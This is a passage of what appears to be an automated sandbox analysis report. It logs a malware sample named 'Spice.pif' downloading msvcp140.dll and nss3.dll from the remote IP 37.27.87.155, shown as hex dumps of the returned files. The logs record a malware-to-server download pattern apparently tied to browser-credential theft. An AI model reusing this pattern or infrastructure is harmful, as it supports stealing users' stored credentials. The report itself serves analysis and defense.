                                                                                                                                                                                                                                    Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                    2024-04-30 05:44:17 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                    Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                    2024-04-30 05:44:17 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                    Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    12192.168.2.84972137.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:17 UTC157OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:18 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:18 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 450024
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:18 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                    2024-04-30 05:44:18 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                    Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                    Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                    Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                    Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                    Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                    Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                    Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                    Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                    2024-04-30 05:44:19 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                    Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    13192.168.2.84972237.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:20 UTC153OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:20 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 2046288
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                    Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                    Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                    Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                    Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                    Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                    2024-04-30 05:44:21 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
